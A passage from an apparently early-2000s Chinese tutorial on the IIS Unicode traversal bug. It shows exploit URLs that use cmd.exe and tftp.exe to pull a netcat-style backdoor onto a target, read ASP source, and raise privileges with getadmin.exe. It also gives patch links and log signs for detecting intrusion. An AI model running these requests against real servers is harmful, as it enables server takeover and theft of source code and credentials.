IIS UNICODE Bug

PUT] source [destination]
-i Specifies binary image transfer mode (also called
octet). In binary image mode the file is moved
literally, byte by byte. Use this mode when
transferring binary files.
host Specifies the local or remote host.
GET Transfers the file destination on the remote host to
the file source on the local host.
PUT Transfers the file source on the local host to
the file destination on the remote host.
source Specifies the file to transfer.
destination Specifies where to transfer the file.
帮助是英文的，自己翻译吧。
在UNICODE上的命令代码：
http://x.x.x.x/scripts/tftp.exe?-i+127.0.0.1+get+ncx99.exe
5、ASP相关问题
一般情况下，NT机器绝大多数都会使用到ASP写的WEB程序和SQL数据库。
大家都知道ASP代码的泄露意味着你辛辛苦苦写的ASP源码被人无偿获得，同时你的站点
也很容易遭到黑手。ASP代码泄露的漏洞很多种，同样，在UNICODE编码漏洞下，你的ASP
源码同样可以极易被人获取。
假设你的index.asp是一个很好的程序，那么，入侵者可以通过type命令查看你的文件。
../cmd.exe?/type c:＼inetpub＼wwwroot＼index.asp
或者通过copy命令
../cmd.exe?/copy c:＼inetpub＼wwwroot＼index.asp c:＼inetpub＼wwwroot＼index.txt
然后直接下载你的源码，通过分析，找到你的数据库文件。
如果你是使用SQL服务来做数据库的，同样，入侵者可以通过查看你的ASP和global.asa
源码，通过分析，找到你的用户名和密码，然后通过SQL远程管理客户端进行攻击。
那么，你的商业秘密和网站的资料，还有什么安全可言呢？
入侵者还可以在你的主机里上传一个ASP后门程序（ASE，应该听说过和用过吧）并隐藏
起来，即使你以后补掉了UNICODE漏洞，入侵仍可在他的ASP后门程序在你未发现之前，
查看、修改、删除你主机上的WEB文件。
6、获得超级用户权限
可以通过下在你的SAM文件，利用一些黑客软件（如l0phtcrack）暴力破解。
也可以利用前面介绍的上传方法把gasys.dll、cmd.exe和getadmin.exe到目标主机，
然后通过一些软件或者方法获得目标主机的计算机名，再利用getadmin.exe把
iuser_计算机 升级为Administrator
/scripts/getadmin.exe?IUSR_计算机名
那还有什么事不可以做呢？已经等于完全控制这台主机了。
八．Unicode的安全问题
1、unicode漏洞解决方案
简单解决方案：
限制网络用户访问和调用CMD的权限，
在SCRIPTS、MSADC目录没必要使用的情况下，删除该文件夹或者改名。
安装NT系统时不要使用默认WINNT路径，你可以改为badboy或者其他什么的文件夹。
当然最好的方法还是下载最著名的补丁公司m$提供的补丁。
该漏洞补丁随微软安全公告MS00-057一起发布
(http://www.microsoft.com/technet/security/bulletin/ms00-057.asp)
可以从如下地址下载补丁:
IIS 4.0
http://www.microsoft.com/ntserver/nts/downloads/critical/q301625/default.asp
IIS 5.0
http://www.microsoft.com/windows2000/downloads/critical/q301625/default.asp
2、检查是否被黑客利用unicode漏洞入侵
检查LOG日志
在winnt＼system32＼logfiles＼w3svc1＼目录里保留有web访问记录
如果曾经被人利用UNICODE漏洞访问过，我们可以在日志里看到类似的记录
13:46:07 127.0.0.1 GET /scripts/..＼../winnt/system32/cmd".exe 401
13:46:07 127.0.0.1 GET /scripts/..＼../winnt/system32/cmd".exe 200
如果有人曾经执行过COPY、del、echo、.bat等具有入侵行为命令时
13:47:37 127.0.0.1 GET /scripts/..＼../winnt/system32/cmd".exe 401
13:47:37 127.0.0.1 GET /scripts/..＼../winnt/system32/cmd".exe 502
在winnt/system32/logfiles＼msftp＼svc1目录里可以找到运行FTP的日志
如果有人执行过FTP命令，在日志文件里我可以看到类似的记录
13:59:25 127.0.0.1 [2]USER badboy 331
13:59:25 127.0.0.1 [2]PASS - 230
13:59:25 127.0.0.1 [2]sent /a.txt 226
13:59:25 127.0.0.1 [2]QUIT - 226 这里入侵爱好者请注意，你利用目标主机到某个站点FTP下载什么文件都是被记录
的，不要以为你删除文件、改文件名就可以逃脱你入侵的证据了。
我们不排除有可能入侵者使用代理服务器。
当然你知道自己被人利用UNICODE漏洞来入侵自己的主机，但在这些日志里你
无法找到记录，那你就更要注意了，因为你遇到的不是一般的小菜鸟了。
检查事件查看器里面的错误记录
我们也可以在管理工具的事件查看器里找到入侵者的足迹，比如在某个时段出现
比较多的警告信息。信息类似以下内容：
事件类型: 警告
事件来源: W3SVC
事件种类: 无
事件 ID: 100
日期: 2001-2-2
事件: 21:51:26
用户: N/A
计算机: CLUB-BUM1HOYJHJ
描述:
该服务器因为错误 登录失败: 未知的用户名或错误密码。 而无法登录至 Windows NT 帐号 'CLUB-BUM1HOYJHJ＼badboy'。此数据为错误码。
若要获取关于此消息的更多的信息，请访问 Microsoft 联机支持站点:http://www.microsoft.com/contentredirect.asp 。
数据:
0000: 2e 05 00 00 ....

关键词：IIS UNICODE Bug